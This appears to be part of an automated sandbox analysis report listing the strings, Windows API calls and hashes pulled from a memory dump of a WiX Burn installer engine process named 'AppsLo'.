Department, xrefs: 00F5FE77
Failed to get @Classification., xrefs: 00F5FEF5
Version, xrefs: 00F5FA91
Failed to get @Department., xrefs: 00F5FE8E
Failed to parse related bundles, xrefs: 00F5FA83
Failed to get @Name., xrefs: 00F5FED4
Comments, xrefs: 00F5FCA9
Failed to get @ProviderKey., xrefs: 00F5FAE6
ProviderKey, xrefs: 00F5FAD3
Failed to get @ParentDisplayName., xrefs: 00F5FC98
Contact, xrefs: 00F5FCD1
Name, xrefs: 00F5FEC1
ParentDisplayName, xrefs: 00F5FC81
Failed to get @Publisher., xrefs: 00F5FBDF
Failed to get @PerMachine., xrefs: 00F5FB25
Registration, xrefs: 00F5F9FD
Arp, xrefs: 00F5FB33
Failed to get @ExecutableName., xrefs: 00F5FB07
DisableModify, xrefs: 00F5FCF6
Failed to set registration paths., xrefs: 00F5FF08
Failed to parse software tag., xrefs: 00F5FE10
yes, xrefs: 00F5FD36
Register, xrefs: 00F5FB5D
DisableRemove, xrefs: 00F5FDC9
ProductFamily, xrefs: 00F5FE9C
Failed to select ARP node., xrefs: 00F5FB4F
Failed to get @DisplayName., xrefs: 00F5FB95
Failed to get @Id., xrefs: 00F5FA49
Update, xrefs: 00F5FE1E
UpdateUrl, xrefs: 00F5FC5C
Failed to get @Manufacturer., xrefs: 00F5FE66
Failed to get @DisplayVersion., xrefs: 00F5FBBA
HelpTelephone, xrefs: 00F5FC12
PerMachine, xrefs: 00F5FB12
Publisher, xrefs: 00F5FBC8
Failed to get @Contact., xrefs: 00F5FCE8
Failed to get @Register., xrefs: 00F5FB70
Failed to get @ProductFamily., xrefs: 00F5FEB3
Failed to get @HelpTelephone., xrefs: 00F5FC29
AboutUrl, xrefs: 00F5FC37
DisplayName, xrefs: 00F5FB7E
Failed to parse @Version: %ls, xrefs: 00F5FAC5
Failed to get @HelpLink., xrefs: 00F5FC04
registration.cpp, xrefs: 00F5FD87
DisplayVersion, xrefs: 00F5FBA3
ExecutableName, xrefs: 00F5FAF4
Failed to get @DisableRemove., xrefs: 00F5FDE0
Failed to get @UpdateUrl., xrefs: 00F5FC73
Manufacturer, xrefs: 00F5FE53
Tag, xrefs: 00F5FA57
Classification, xrefs: 00F5FEE2
Failed to get @Tag., xrefs: 00F5FA6A
button, xrefs: 00F5FD15
Failed to get @DisableModify., xrefs: 00F5FDB8
Failed to get @Version., xrefs: 00F5FAA4
Failed to select Update node., xrefs: 00F5FE3C
Failed to get @Comments., xrefs: 00F5FCC0

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
API String ID: 760788290-2956246334
Opcode ID: d387cc055c655ff70cfb4c236fe0e4bb2f4ae69762952ea6b5fbe06b46e449c2
Instruction ID: e02642df22d946363438d719a7621c97d659eaeb4eb6d7b3515681473ed5fa03
Opcode Fuzzy Hash: d387cc055c655ff70cfb4c236fe0e4bb2f4ae69762952ea6b5fbe06b46e449c2
Instruction Fuzzy Hash: 10E1E576E44625BBDF119664CC42FADBAA87B06721F1202B1BF11F6191CB61DE0CB6C1

Function 00F5B48B Relevance: 91.6, APIs: 24, Strings: 28, Instructions: 578
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 00F5B502
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B550
GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 00F5B556
ReadFile.KERNELBASE(00000000,00F54461,00000040,?,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B59E
GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 00F5B5A4
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B601
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B607
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B650
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B656
SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B6C7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B6CD
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B716
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B71C
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B765
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B76B
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B7B7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B7BD

Part of subcall function 00F5394F: GetProcessHeap.KERNEL32(?,?,?,00F52274,?,00000001,7694B390,8000FFFF,?,?,00F90267,?,?,00000000,00000000,8000FFFF), ref: 00F53960
Part of subcall function 00F5394F: RtlAllocateHeap.NTDLL(00000000,?,00F52274,?,00000001,7694B390,8000FFFF,?,?,00F90267,?,?,00000000,00000000,8000FFFF), ref: 00F53967

ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B810
ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B872
SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B8FC
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00F5B906

Strings

Failed to read section info, data to short: %u, xrefs: 00F5B8AA
Failed to open handle to user process path., xrefs: 00F5B52D
Failed to find valid DOS image header in buffer., xrefs: 00F5BBEB
Failed to read DOS header., xrefs: 00F5B5CF
Failed to read complete section info., xrefs: 00F5B9C5
Failed to find Burn section., xrefs: 00F5BB32
Failed to read image section header, index: %u, xrefs: 00F5BBAC
.wix, xrefs: 00F5B830
Failed to seek to section info., xrefs: 00F5B6F8, 00F5B934
Failed to read section info, unsupported version: %08x, xrefs: 00F5B9F5
Failed to read complete image section header, index: %u, xrefs: 00F5BB75
Failed to allocate buffer for section info., xrefs: 00F5B8E4
4, xrefs: 00F5B884
Failed to read signature offset., xrefs: 00F5B747
PE, xrefs: 00F5B698
Failed to seek to NT header., xrefs: 00F5B632
section.cpp, xrefs: 00F5B523, 00F5B577, 00F5B5C5, 00F5B628, 00F5B677, 00F5B6EE, 00F5B73D, 00F5B78C, 00F5B7E1, 00F5B898, 00F5B8D8, 00F5B92A, 00F5B98F, 00F5B9B9, 00F5B9E0, 00F5BAC7, 00F5BB07, 00F5BB26, 00F5BB63, 00F5BBA1, 00F5BBC4, 00F5BBDF
PE Header from file didn't match PE Header in memory., xrefs: 00F5BB11
(, xrefs: 00F5B81D
Failed to seek to start of file., xrefs: 00F5B581
Failed to read section info., xrefs: 00F5B999
Failed to seek past optional headers., xrefs: 00F5B7EB
Failed to read signature size., xrefs: 00F5B796
Failed to allocate memory for container sizes., xrefs: 00F5BAD3
Failed to find valid NT image header in buffer., xrefs: 00F5BBD0
Failed to read NT header., xrefs: 00F5B681
Failed to get total size of bundle., xrefs: 00F5BA23
burn, xrefs: 00F5B838

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to user process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
API String ID: 3411815225-695169583
Opcode ID: c17130956560a7e2d7a865ade69e02905907c2cd5bd9a22d34367b2786bcbcd2
Instruction ID: b8a904955f4d4c4980bea7fab086b51f6b0ad1f6d606dbf9cdd9305643fbd22c
Opcode Fuzzy Hash: c17130956560a7e2d7a865ade69e02905907c2cd5bd9a22d34367b2786bcbcd2
Instruction Fuzzy Hash: E3120672D40235ABEB34DB558C46FAA76A4AF44B22F1101A5FF04BB280E774DD44EBE1

Function 00F70D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,?,00F708BC,?,?), ref: 00F70D25
GetLastError.KERNEL32(?,?,?,?,00F708BC,?,?), ref: 00F70D2F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,00F708BC,?,?), ref: 00F70D74
GetLastError.KERNEL32(?,?,?,?,00F708BC,?,?), ref: 00F70D7F
ResetEvent.KERNEL32(?,?,?,?,?,00F708BC,?,?), ref: 00F70DB7
GetLastError.KERNEL32(?,?,?,?,00F708BC,?,?), ref: 00F70DC1

Strings

Failed to allocate buffer for stream., xrefs: 00F70F93
Failed to set file pointer to end of file., xrefs: 00F7104F
Failed to wait for begin operation event., xrefs: 00F70DAD, 00F70EE6
Failed to set end of file., xrefs: 00F71094
Failed to set operation complete event., xrefs: 00F70D5D, 00F70E9E
cabextract.cpp, xrefs: 00F70D53, 00F70DA3, 00F70DE5, 00F70E11, 00F70E94, 00F70EDC, 00F70F21, 00F70F89, 00F70FF4, 00F71045, 00F7108A, 00F710CE
Failed to create file: %ls, xrefs: 00F71001
Failed to copy stream name: %ls, xrefs: 00F70E50
Failed to set file pointer to beginning of file., xrefs: 00F710D8
Invalid operation for this state., xrefs: 00F70E1D
Failed to reset begin operation event., xrefs: 00F70DEF, 00F70F2B

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorLast$Event$ObjectResetSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 1865021742-2104912459
Opcode ID: 11a023977b89e6d0a8d08e3b48b1435bfbc0d1e8dac9fa838b32b1f3343f04ea
Instruction ID: 2a38a274779ea48a9b9f072c6c902ab489811c6f4269c24837cd2545da9b8325
Opcode Fuzzy Hash: 11a023977b89e6d0a8d08e3b48b1435bfbc0d1e8dac9fa838b32b1f3343f04ea
Instruction Fuzzy Hash: B7912773980636A7D73117A95E09B2A3950BF05B71F128227BE18BA2D0EB54EC04F2D3

Function 00F55195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F55217

Part of subcall function 00F904F8: InitializeCriticalSection.KERNEL32(00FBB5FC,?,00F55223,00000000,?,?,?,?,?,?), ref: 00F9050F

Part of subcall function 00F5120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00F5523F,00000000,?), ref: 00F51248
Part of subcall function 00F5120A: GetLastError.KERNEL32(?,?,?,00F5523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00F51252

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00F55285

Part of subcall function 00F90E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00F90E28

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00F55317
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00F55321
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F5558E

Strings

Failed to initialize user state., xrefs: 00F5526C
Failed to parse command line., xrefs: 00F55245
Failed to run embedded mode., xrefs: 00F55444
Failed to run per-user mode., xrefs: 00F55494
Failed to run per-machine mode., xrefs: 00F5546C
Failed to run untrusted mode., xrefs: 00F554B6
Failed to initialize COM., xrefs: 00F55291
Failed to initialize Wiutil., xrefs: 00F552E1
Invalid run mode., xrefs: 00F553F9
Failed to initialize XML util., xrefs: 00F552F9
Failed to initialize core., xrefs: 00F553C3
3.11.1.2318, xrefs: 00F55384
user.cpp, xrefs: 00F55345
Failed to run RunOnce mode., xrefs: 00F5541C
Failed to initialize Cryputil., xrefs: 00F552A6
Failed to get OS info., xrefs: 00F5534F
Failed to initialize Regutil., xrefs: 00F552C9

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize user state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$user.cpp
API String ID: 3262001429-510904028
Opcode ID: b93b5e138b5c45d1e8e2c83244544cc96a3e579e07be19408f0d0af7fae5fea4
Instruction ID: 60a0088891b34da49c0774e849101586d575631985c6050743a3d02d596fae73
Opcode Fuzzy Hash: b93b5e138b5c45d1e8e2c83244544cc96a3e579e07be19408f0d0af7fae5fea4
Instruction Fuzzy Hash: 44B1C672D40A299BDF31AF94CD66BED7674AF04B12F0400D5EE08A6241DB749E88FF91

Function 00F6752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to parse command line., xrefs: 00F67667
Failed to get manifest stream from container., xrefs: 00F675CC
Failed to set original source variable., xrefs: 00F6776A
Failed to get unique temporary folder for bootstrapper application., xrefs: 00F677CE
WixBundleElevated, xrefs: 00F676A5, 00F676B6
WixBundleSourceProcessPath, xrefs: 00F676F8
WixBundleOriginalSource, xrefs: 00F67759
Failed to overwrite the %ls built-in variable., xrefs: 00F676BB
Failed to open attached UX container., xrefs: 00F6758E
Failed to load manifest., xrefs: 00F675E8
WixBundleUILevel, xrefs: 00F676D6, 00F676E7
WixBundleSourceProcessFolder, xrefs: 00F67734
Failed to initialize internal cache functionality., xrefs: 00F6779F
Failed to load catalog files., xrefs: 00F6780F
Failed to set source process path variable., xrefs: 00F67709
Failed to get source process folder from path., xrefs: 00F67725
Failed to initialize variables., xrefs: 00F67571
Failed to set source process folder variable., xrefs: 00F67745
Failed to extract bootstrapper application payloads., xrefs: 00F677EF
Failed to open manifest stream., xrefs: 00F675AB

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
API String ID: 32694325-1564579409
Opcode ID: 29f9594cdea3c9b3f504faa61d4bd1d2ec5e8de5941362c6f388e6f6d5b0f9db
Instruction ID: 3ddc9ab1c69f1b2b2a4f3b4ab64f8d7c106029aa880d306506801b1a6dbb34fe
Opcode Fuzzy Hash: 29f9594cdea3c9b3f504faa61d4bd1d2ec5e8de5941362c6f388e6f6d5b0f9db
Instruction Fuzzy Hash: 3BA1A472E4471ABADB12AAA4CC85FEAB76CBB00714F100266FA15F7141D774ED04EBE1

Function 00F5762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00F6756B,00F553BD,00000000,00F55445), ref: 00F5764C

Strings

WixBundleForcedRestartPackage, xrefs: 00F57E14
WixBundleTag, xrefs: 00F57EAE
WixBundleVersion, xrefs: 00F57ECE
WixBundleElevated, xrefs: 00F57E46
WixBundleSourceProcessPath, xrefs: 00F57E8E
WixBundleAction, xrefs: 00F57D76
WixBundleProviderKey, xrefs: 00F57E7E
Failed to add built-in variable: %ls., xrefs: 00F57F19
WixBundleUILevel, xrefs: 00F57EBE
0, xrefs: 00F57663
WixBundleExecutePackageCacheFolder, xrefs: 00F57D98
InstallerVersion, xrefs: 00F57833
WixBundleExecutePackageAction, xrefs: 00F57DF8
#, xrefs: 00F576CB
WixBundleSourceProcessFolder, xrefs: 00F57E9E
WixBundleActiveParent, xrefs: 00F57E62
InstallerName, xrefs: 00F57812
', xrefs: 00F578EB
Date, xrefs: 00F57770
$, xrefs: 00F57D49
WixBundleInstalled, xrefs: 00F57E2A
LogonUser, xrefs: 00F57882

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
API String ID: 32694325-3635313340
Opcode ID: f17cd7837d452448220be7cd0aa673b215c0def496f1270a99877ecf3070f659
Instruction ID: 9aab9ceb4bbceaf54bd0af109a6c203c16a00fca105598c805c20fae0a9761a8
Opcode Fuzzy Hash: f17cd7837d452448220be7cd0aa673b215c0def496f1270a99877ecf3070f659
Instruction Fuzzy Hash: 11324CB0D156299BEF65CF5AC9887CDFAB4BB49304F9041EED60CA7211C7B00A889F95

Function 00F682BA Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00F55489), ref: 00F68310

Part of subcall function 00F90879: OpenProcessToken.ADVAPI32(?,00000008,?,00F553BD,00000000,?,?,?,?,?,?,?,00F6769D,00000000), ref: 00F90897
Part of subcall function 00F90879: GetLastError.KERNEL32(?,?,?,?,?,?,?,00F6769D,00000000), ref: 00F908A1
Part of subcall function 00F90879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00F6769D,00000000), ref: 00F9092B

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00F68336
GetLastError.KERNEL32 ref: 00F68340
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 00F683BD
GetLastError.KERNEL32 ref: 00F683C7
UuidCreate.RPCRT4(?), ref: 00F68406

Strings

Failed to get windows path for working folder., xrefs: 00F6836E
Temp\, xrefs: 00F68395
Failed to ensure windows path for working folder ended in backslash., xrefs: 00F6838B
Failed to append bundle id on to temp path for working folder., xrefs: 00F68470
Failed to copy working folder path., xrefs: 00F6848B
%ls%ls\, xrefs: 00F68458
Failed to get temp path for working folder., xrefs: 00F683F5
4#v, xrefs: 00F683BD
Failed to convert working folder guid into string., xrefs: 00F68446
Failed to create working folder guid., xrefs: 00F68413
Failed to concat Temp directory on windows path for working folder., xrefs: 00F683AD
cache.cpp, xrefs: 00F68364, 00F683EB, 00F6843C

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
String ID: 4#v$%ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
API String ID: 266130487-3587817078
Opcode ID: 92b8939cec36b0473bed082993c663b04bf008881980da372f4953736d12a8e0
Instruction ID: 9648dfa7d56dc32158ec532f4737c134531325590874b2739273675057305d04
Opcode Fuzzy Hash: 92b8939cec36b0473bed082993c663b04bf008881980da372f4953736d12a8e0
Instruction Fuzzy Hash: 39410873E40329A7DB20D6A4CC4AF9A736C9B04B91F044259BE04E7280EE74DD0566E6

Function 00F710FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 00F7111D
CoUninitialize.COMBASE ref: 00F71398

Strings

Failed to extract all files from container, erf: %d:%X:%d, xrefs: 00F71279
Failed to wait for begin operation event., xrefs: 00F71311
<the>.cab, xrefs: 00F711BD
Failed to set operation complete event., xrefs: 00F712C4
cabextract.cpp, xrefs: 00F71193, 00F712BA, 00F71307, 00F71346, 00F71372
Failed to initialize COM., xrefs: 00F71129
Invalid operation for this state., xrefs: 00F7137C
Failed to reset begin operation event., xrefs: 00F71350
Failed to initialize cabinet.dll., xrefs: 00F7119F

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-1168358783
Opcode ID: bd6e9c4023d4255c7692df6e9d2eb81f6e0e35feda6c0ebceb0baee725d427e0
Instruction ID: 7cbd1cb9ca21c28e37a6af65ba4c8c4c94aaa328dc1cbd15e860e6789eac3355
Opcode Fuzzy Hash: bd6e9c4023d4255c7692df6e9d2eb81f6e0e35feda6c0ebceb0baee725d427e0
Instruction Fuzzy Hash: F7512937D40165E79B20579C8C05E7B3654BB46B70B228367BD09FB292D619CC08F2E3

Function 00F542D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00F55266,?,?,00000000,?,?), ref: 00F54303
InitializeCriticalSection.KERNEL32(000000D0,?,?,00F55266,?,?,00000000,?,?), ref: 00F5430C
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00F55266,?,?,00000000,?,?), ref: 00F54352
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00F55266,?,?,00000000,?,?), ref: 00F5435C
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00F55266,?,?,00000000,?,?), ref: 00F54370
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00F55266,?,?,00000000,?,?), ref: 00F54380
